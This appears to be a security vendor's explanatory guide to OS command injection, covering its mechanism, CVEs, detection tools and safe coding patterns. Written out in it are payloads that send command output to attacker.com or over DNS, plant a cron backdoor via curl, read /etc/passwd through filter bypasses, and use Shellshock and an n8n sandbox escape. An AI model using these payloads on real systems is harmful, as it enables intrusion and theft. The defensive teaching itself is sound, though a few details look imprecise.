Command Injection

What is Command Injection?#

Command injection is a vulnerability where user-controlled data is passed to an OS shell or command execution function without adequate neutralization (CWE-78: Improper Neutralization of Special Elements used in an OS Command). The shell interprets injected metacharacters — semicolons, pipes, backticks, $() substitution — as control operators, causing it to execute attacker-supplied commands with the privileges of the application process.

This is distinct from code injection (CWE-94), which targets the application's own runtime interpreter (e.g., eval() in Python or PHP). Command injection targets the underlying OS shell. It is also different from SQL injection, which is confined to the database layer. A successful command injection grants the attacker direct access to the host operating system: file system, process table, network interfaces, and credentials.

OWASP categorizes injection in A03:2021 (the current Top 10), with 33 CWEs mapped to this category. CWE-78 (OS Command Injection) is consistently scored at CVSS 9.8 as a base severity for unauthenticated network-reachable flaws. According to CISA's July 2024 Secure by Design alert, OS command injection remains one of the most preventable yet persistently exploited vulnerability classes in enterprise software.

Mechanism#

The root cause is simple: any time an application builds an OS command by concatenating user-supplied strings and passes the result to a shell interpreter (/bin/sh, cmd.exe, PowerShell), the shell parses every character in the string — including the attacker's injected control operators.

The attack flow proceeds in five steps:

1. The application receives user input intended as a data argument (e.g., a hostname to ping, a filename to process, an IP to scan).
2. Application code concatenates the input into a shell command string: "ping -c 1 " + user_input.
3. The resulting string is passed to a shell execution function: os.system(), exec(), shell_exec(), Runtime.exec(String).
4. The shell tokenizes the string, recognizes metacharacters injected by the attacker, and executes the additional commands.
5. Output appears in the HTTP response (in-band), is delayed (time-based), or triggers an outbound network connection (OOB).

A minimal demonstration — a vulnerable ping endpoint and the resulting exploitation:

GET /api/tools/ping?host=127.0.0.1;id HTTP/1.1
Host: vulnerable.example.com

HTTP/1.1 200 OK
Content-Type: text/plain
 
PING 127.0.0.1: 56 data bytes
--- 127.0.0.1 ping statistics ---
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The id command executes because && chains commands (and the same risk applies to ;, |, || separators) and starts a new one. The application returns both outputs without filtering.

Attack Variants#

Classic in-band injection is the simplest form: the injected command's output appears directly in the HTTP response. Common separators include ; (sequential), | (pipe stdout to stdin), && (conditional AND), || (conditional OR), and %0a (URL-encoded newline — bypasses filters blocking ;|&).

Blind injection produces no output in the response. The application executes the command but discards stdout/stderr, or the injection runs in a background process. Attackers use side channels: time delays, file writes to web-accessible paths, or OOB channels.

Time-based blind injection requires a proportional validation protocol to eliminate false positives from network jitter. Inject sleep 7 and measure delay T1; inject sleep 14 and measure T2. Confirm only when T1 - baseline ≥ 5.5s AND T2 - T1 ≥ 5.5s. A single spike without scaling is server load, not injection.

Out-of-band injection triggers a DNS or HTTP request from the target server to an attacker-controlled listener. The subdomain encodes command output: ; nslookup $(whoami).COLLABORATOR.oastify.com. When the DNS server receives a lookup for www-data.COLLABORATOR.oastify.com, the injection is confirmed and the running user is exfiltrated. OOB is superior to time-based because it is immune to server load and provides identity proof. Tools: Burp Collaborator, Interactsh (oast.pro, oast.live).

Argument Injection (CWE-88)#

Argument injection is categorically different from classic OS command injection. No shell metacharacters are needed. The attacker injects command-line flags into an array-form subprocess call that the developer assumed was safe.

# Developer intent: clone a user-specified repository
subprocess.run(["git", "clone", user_repo])  # No shell — but still vulnerable
 
# Attacker input:
# user_repo = "--upload-pack=touch /tmp/pwned http://legitimate-looking-url.com"
# Resulting call: git clone --upload-pack=touch /tmp/pwned http://legitimate-looking-url.com
# git executes: touch /tmp/pwned

Other high-impact argument injection vectors:

# curl: write attacker-controlled content to arbitrary path
subprocess.run(["curl", user_url])
# user_url = "-o /etc/cron.d/backdoor http://attacker.com/payload"
 
# SSH: ProxyCommand execution via flag injection
subprocess.run(["ssh", user_host])
# user_host = "-oProxyCommand=id>/tmp/pwned some-host"
 
# psql: pipe output to command via -o flag
subprocess.run(["psql", "-c", user_query, db_url])
# user_query = "-o'|id>/tmp/pwned'"

The POSIX -- end-of-options terminator mitigates most argument injection:

subprocess.run(["git", "clone", "--", user_repo])  # -- prevents flag injection

CVE-2024-39930 (Gogs SSH server, CVSS 9.9) is a production example: SSH argument injection yielded full code execution on a self-hosted Git platform without any shell metacharacters.

Second-Order (Stored) Injection#

Second-order injection stores the payload at one point in the application and triggers execution later — often by a higher-privileged process such as a cron job, admin script, or report generator.

A user registers with username = alice; curl http://attacker.com/$(id). The registration endpoint stores the value without executing it. A nightly reporting script runs: system("echo Processing user: " + username). The injected command fires in the cron context, potentially with root privileges. OOB payloads with long TTL DNS records are the most reliable detection technique — they fire when the deferred process runs, minutes or hours later.

Filter Bypass Techniques#

Most injection filters block the obvious characters: ;, |, &, $. These techniques bypass them.

IFS and Whitespace Tricks#

The Internal Field Separator ($IFS) replaces literal spaces, bypassing filters that block space characters in the value:

cat${IFS}/etc/passwd       # IFS expands to space/tab/newline
cat$IFS/etc/passwd         # short form
cat</etc/passwd            # input redirection — no space needed
cat%09/etc/passwd          # URL-encoded tab (0x09)

Brace Expansion#

Bash brace expansion creates a space-free command invocation:

{cat,/etc/passwd}          # equivalent to: cat /etc/passwd
{ls,-la,/tmp}              # ls -la /tmp — no spaces, no pipes

Encoding (Base64, Hex, URL, Unicode)#

# Base64 bypass (defeats keyword filters on "id", "whoami", "cat")
echo${IFS}aWQK|base64${IFS}-d|sh     # base64("id\n") = aWQK
bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dk)  # cat /etc/passwd
 
# Hex encoding
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'; cat $abc
 
# Double URL encoding (if application decodes twice)
%253b → %3b → ;   (semicolon)
%2526 → %26 → &   (ampersand)
 
# Unicode fullwidth normalization (some platforms normalize)
；  (U+FF1B FULLWIDTH SEMICOLON) → may normalize to ;
｜  (U+FF5C FULLWIDTH VERTICAL LINE) → may normalize to |

Windows-Specific Bypasses (cmd.exe)#

REM Caret escape — bypasses character-based filters
c^m^d /c whoami
w^ho^am^i
 
REM Case insensitivity — bypasses case-sensitive keyword filters
WhoAmI
WHOAMI
 
REM Variable expansion to build commands
set c=who
set d=ami
%c%%d%
 
REM Environment variable substring extraction
%PROGRAMFILES:~10,-5%    # extracts "calc" from "C:\Program Files"

Polyglot Cross-Shell#

Works across unquoted, single-quoted, and double-quoted injection contexts simultaneously:

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}

Real-World CVEs & Incidents#

CVE-2024-3400 — PAN-OS GlobalProtect (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Discovered on April 12, 2024 and added to CISA's Known Exploited Vulnerabilities catalog the same day. The two-stage attack used a malformed SESSID cookie containing path traversal characters to create an arbitrary file on the device filesystem. A second request triggered the created file to execute as a Python script with root privileges. Threat actor UTA0218 (tracked by Volexity) deployed a Python backdoor called UPSTYLE using this vulnerability, targeting government, telecommunications, and critical infrastructure networks globally. This CVE exemplifies the dominant 2024-2025 exploitation pattern: a file write primitive chained into command execution by a privileged background process.

CVE-2024-21887 — Ivanti Connect Secure (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Disclosed January 10, 2024, this command injection in the /api/v1/license/key-status/<node_name> endpoint required administrator authentication. In isolation, CVSS 9.1. Chained with CVE-2023-46805 (authentication bypass, CVSS 8.2), the combination yielded unauthenticated RCE — one of the most impactful exploit chains of 2024. Nation-state actors deployed ZIPLINE, THINSPOOL, WIREFIRE, and LIGHTWIRE malware implants across thousands of organizations, including US government agencies. The CISA Secure by Design alert cited this CVE as evidence that authentication requirements do not sufficiently mitigate command injection — vendors must eliminate the root cause.

CVE-2025-68613 — n8n Expression Injection (CVSS 9.9)

A new attack surface emerged in 2025: AI workflow automation platforms. n8n versions 0.211.0 through 1.120.3 evaluated JavaScript expressions ({{ $json.value }}) in an insufficiently sandboxed context. A low-privilege user with workflow editing rights could escape the sandbox via process.mainModule.require and access Node.js internals:

{{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require('child_process').execSync;
  return execSync('whoami').toString();
})() }}

With 103,000+ n8n instances publicly exposed as of December 2025, this represents a class of injection vulnerability that will grow as LLM-driven automation platforms proliferate.

Historical reference — CVE-2016-3714 (ImageTragick)

ImageMagick's delegates.xml processed user-supplied image filenames in shell system() calls with the %M specifier unescaped. A malicious MVG/SVG file with content like fill 'url(https://example.com/"|id > /tmp/pwned")' triggered OS command execution in any application that called convert on uploaded images. This affected PHP, Ruby, Node.js, and Python applications using the imagick binding. Every web application accepting image uploads that ran through ImageMagick was potentially vulnerable.

HackerOne reports: HackerOne #212696 (Imgur) — RCE via command-line argument injection in an image processing binary; HackerOne #2293731 (Internet Bug Bounty) — command injection via SSH ProxyCommand in an application passing user-controlled hostnames to subprocess calls (CVE-2023-6004).

Detection#

Manual Testing#

1. Identify all input vectors that could reach an OS execution function: URL parameters, POST body fields, HTTP headers (User-Agent, Referer, X-Forwarded-For), filenames in upload flows, and JSON fields in API bodies.
2. Submit a canary payload in each parameter: ; echo cmdi-CANARY-$(id). If uid= appears in the response, injection is confirmed.
3. If the response carries no output, switch to time-based: inject ; sleep 7 and baseline ; sleep 0. Confirm only if the delta ≥ 5.5 seconds and scales proportionally with ; sleep 14.
4. For OOB confirmation, use Burp Collaborator or Interactsh: ; nslookup $(whoami).YOUR-SUBDOMAIN.oastify.com. Monitor the Collaborator panel for a DNS interaction containing the running user in the subdomain.
5. Test HTTP headers for Shellshock residuals in CGI environments: User-Agent: () { :;}; /bin/bash -c 'id'. Test X-Forwarded-For for logging-layer injection (CVE-2022-46169 vector).
6. For argument injection: submit values beginning with - or -- in any parameter passed to an external binary (image converters, archive tools, network utilities).

Automated Detection#

Commix (v4.1, 5,700+ GitHub stars) is the reference DAST tool. It tests classic, time-based, file-based, and OOB techniques across GET/POST parameters, headers, cookies, and JSON:

# Basic GET parameter scan
commix --url "http://target.com/ping?host=*"
 
# Header injection test
commix --url "http://target.com/" --headers "User-Agent: *"
 
# JSON body with smart mode and level 3
commix --url "http://target.com/api" --data '{"host": "*"}' --data-type json \
       --batch --smart --level=3 --technique=CTF --failed-tries=3

Burp Suite Pro active scanner uses Collaborator-based OOB detection for blind injection contexts where timing is unreliable. The OAST polling detects callbacks missed by response-based analysis.

Semgrep SAST rules flag vulnerable patterns in source code before deployment:

• python.lang.security.audit.subprocess-shell-true.subprocess-shell-true
• javascript.lang.security.detect-child-process.detect-child-process
• java.lang.security.audit.command-injection-formatted-runtime-call

CodeQL provides inter-procedural taint tracking from HTTP request sources to OS execution sinks (Runtime.exec, ProcessBuilder, subprocess, child_process.exec), finding injection chains across multiple function call layers.

BreachVex confirms command injection through multiple complementary techniques: an in-band canary echo confirmed in the response, proportional time-delta validation, an out-of-band DNS callback with per-probe correlation IDs, and a structural signal (the parameter accepts metacharacters without sanitization errors). Each finding ships with the strongest proof obtained.

Prevention#

OWASP, PortSwigger, and CISA converge on a single primary defense: avoid OS commands from application-layer code entirely. Use language-native libraries for tasks that seem to require shell tools.

When OS commands are unavoidable, use array-form APIs that bypass shell interpretation entirely.

Python#

import subprocess, re
 
# DANGEROUS — shell=True spawns /bin/sh, metacharacters interpreted
import os
os.system(f"ping -c 1 {user_host}")              # injection vector
subprocess.run(f"ping -c 1 {user_host}", shell=True)  # same risk
 
# SAFE — array form, shell=False (default)
subprocess.run(["ping", "-c", "1", user_host])   # no shell
 
# SAFER — allowlist validation before the call
if not re.fullmatch(r'^\d{1,3}(\.\d{1,3}){3}$', user_host):
    raise ValueError("Invalid IP address")
subprocess.run(["ping", "-c", "1", user_host])
 
# shlex.quote() — POSIX only, NOT Windows-safe, use as last resort
# Still requires shell=True which is already risky — prefer array form

Node.js#

const { exec, execFile, spawn } = require('child_process');
 
// DANGEROUS — exec always spawns a shell
exec(`ping -c 1 ${req.query.host}`, callback);
 
// DANGEROUS — shell: true makes spawn equivalent to exec
spawn('ping', ['-c', '1', req.query.host], { shell: true });
 
// SAFE — execFile bypasses shell
execFile('ping', ['-c', '1', req.query.host], callback);
 
// SAFE — spawn with shell: false (default)
const child = spawn('ping', ['-c', '1', req.query.host], { shell: false });
 
// WARNING — on Windows, executing .bat/.cmd files implicitly invokes cmd.exe
// Even shell: false does NOT protect against BatBadBut (CVE-2024-27980)
// Avoid batch files with user-controlled arguments on Windows entirely

Java#

String userInput = request.getParameter("host");
 
// DANGEROUS — string form, platform-dependent tokenization
Runtime.getRuntime().exec("ping -c 1 " + userInput);
 
// DANGEROUS — explicit shell invocation
Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "ping -c 1 " + userInput});
 
// SAFE — ProcessBuilder with explicit argument list
ProcessBuilder pb = new ProcessBuilder("ping", "-c", "1", userInput);
pb.redirectErrorStream(true);
Process p = pb.start();

PHP#

$host = $_GET['host'];
 
// DANGEROUS — all invoke shell with user data
exec("ping -c 1 $host", $output);
system("ping -c 1 " . $host);
shell_exec("ping -c 1 $host");
 
// ACCEPTABLE — escapeshellarg() wraps input in single quotes
$safeHost = escapeshellarg($host);
exec("ping -c 1 $safeHost", $output);
 
// BEST — allowlist validation + escapeshellarg as defense-in-depth
if (!filter_var($host, FILTER_VALIDATE_IP)) {
    http_response_code(400);
    exit("Invalid input");
}
exec("ping -c 1 " . escapeshellarg($host), $output);
 
// NOTE: escapeshellarg() on Windows is insufficient (CVE-2024-1874, CVE-2024-5585)
// Avoid .bat/.cmd invocation with user input on Windows regardless of escaping

Go#

import "os/exec"
 
// SAFE — exec.Command does not invoke a shell; args passed directly to OS
cmd := exec.Command("ping", "-c", "1", userInput)
out, err := cmd.Output()
 
// DANGEROUS — explicit shell invocation (avoid)
cmd := exec.Command("sh", "-c", "ping -c 1 " + userInput)
 
// WINDOWS CAVEAT — .bat/.cmd files implicitly invoke cmd.exe on Windows
// cmd := exec.Command("script.bat", userInput)  // UNSAFE on Windows
// See golang/go issue #27199

Ruby#

# DANGEROUS — all forms invoke shell with metacharacter interpretation
`ping -c 1 #{user_input}`              # backtick
%x[ping -c 1 #{user_input}]           # equivalent
system("ping -c 1 #{user_input}")      # single-string form invokes shell
 
# SAFE — multi-argument form bypasses shell
system("ping", "-c", "1", user_input)  # no shell
exec("ping", "-c", "1", user_input)    # no shell
require 'open3'
Open3.capture2("ping", "-c", "1", user_input)  # no shell

.NET (C#)#

// DANGEROUS — Arguments as a single string allows injection
var psi = new ProcessStartInfo("cmd.exe", "/c ping -n 1 " + userInput);
Process.Start(psi);
 
// SAFE — ArgumentList (array form), available .NET 5+
var psi = new ProcessStartInfo("ping") {
    // ArgumentList bypasses shell string parsing entirely
};
psi.ArgumentList.Add("-n");
psi.ArgumentList.Add("1");
psi.ArgumentList.Add(userInput);   // treated as opaque data
Process.Start(psi);

Defense in Depth 2025#

Even when command injection occurs, container security controls limit the blast radius:

# docker-compose.yml
security_opt:
  - seccomp:./seccomp-profile.json   # block ptrace, unshare, init_module
  - no-new-privileges:true
cap_drop:
  - ALL
cap_add:
  - NET_BIND_SERVICE   # only what the application needs
read_only: true
tmpfs:
  - /tmp:size=100m,noexec            # noexec blocks executing uploaded files

Drop CAP_SYS_PTRACE to prevent process injection, CAP_SYS_ADMIN to prevent namespace escape, CAP_SETUID to prevent privilege escalation. AppArmor or SELinux profiles can restrict which binaries the application process may execute, limiting attacker options even after injection.

Why Input Sanitization for Shell is Dead#

Frequently Asked Questions#

What is the difference between command injection and code injection? Command injection (CWE-77/CWE-78) passes attacker-controlled input to an OS shell, executing system binaries. Code injection (CWE-94) injects source code evaluated by the application's own runtime (e.g., eval() in Python or PHP). Command injection requires a shell context; code injection requires an interpreter. Both yield RCE but through different paths.

What is the difference between command injection and SQL injection? SQL injection targets database query parsers to manipulate data. Command injection targets the OS shell to execute arbitrary binaries. SQL injection is constrained to the database layer; command injection can compromise the full operating system, install backdoors, and pivot to internal networks.

What is argument injection (CWE-88)? Argument injection injects command-line flags or options — not shell metacharacters — into a spawned process. Even shell=False array-form subprocess calls are vulnerable if user input can prepend flags. No shell is invoked; the binary itself interprets the injected option. The POSIX -- end-of-options terminator is the primary mitigation.

Is command injection the same as remote code execution (RCE)? Command injection is a vulnerability class; RCE is an impact. Successful command injection achieves RCE. Not all RCE stems from command injection — deserialization flaws, SSTI, and file inclusion also lead to RCE — but command injection is one of the most direct paths.

How does blind command injection work? The application executes the injected command but returns no output. Detection relies on time delays (proportional sleep validation), OOB DNS/HTTP callbacks to Interactsh or Burp Collaborator, or file writes to web-accessible paths.

Can a WAF fully prevent command injection? No. ${IFS} substitution, brace expansion, base64-encoded payloads, Unicode fullwidth characters, and double URL-encoding bypass most WAF rulesets. WAFs add detection depth but cannot replace parameterized execution APIs.

What CVEs are associated with command injection in 2024-2025? CVE-2024-3400 (PAN-OS, CVSS 10.0), CVE-2024-24576 (Rust BatBadBut, CVSS 10.0), CVE-2024-21887 (Ivanti, CVSS 9.1), CVE-2024-9463 (Palo Alto Expedition, CVSS 9.9), CVE-2025-68613 (n8n, CVSS 9.9), CVE-2022-46169 (Cacti, CVSS 9.8), and CVE-2024-27980 (Node.js Windows spawn).

Why did CISA issue a Secure by Design alert about command injection? On July 10, 2024, CISA and the FBI issued a joint alert citing CVE-2024-20399, CVE-2024-3400, and CVE-2024-21887 as evidence that vendors ship products with preventable OS command injection flaws. CISA called on manufacturers to eliminate this class through secure-by-default architecture, not post-release patching.

What was Shellshock? CVE-2014-6271 (CVSS 10.0) — a GNU Bash flaw where environment variable parsing executed trailing commands after function definitions: () { :;}; /bin/bash -c 'id'. Exploited via CGI scripts within hours of disclosure, it compromised millions of systems globally and remains a reference example in penetration testing curricula.

Resources#

• Score this vulnerability with our free CVSS v4.0 calculator
• OWASP OS Command Injection Defense Cheat Sheet
• PortSwigger Web Security Academy — OS Command Injection
• CISA Secure by Design Alert — Eliminating OS Command Injection (July 2024)
• Sonar Argument Injection Vectors Reference
• GHSA Advisory — CVE-2025-68613 (n8n Expression Injection)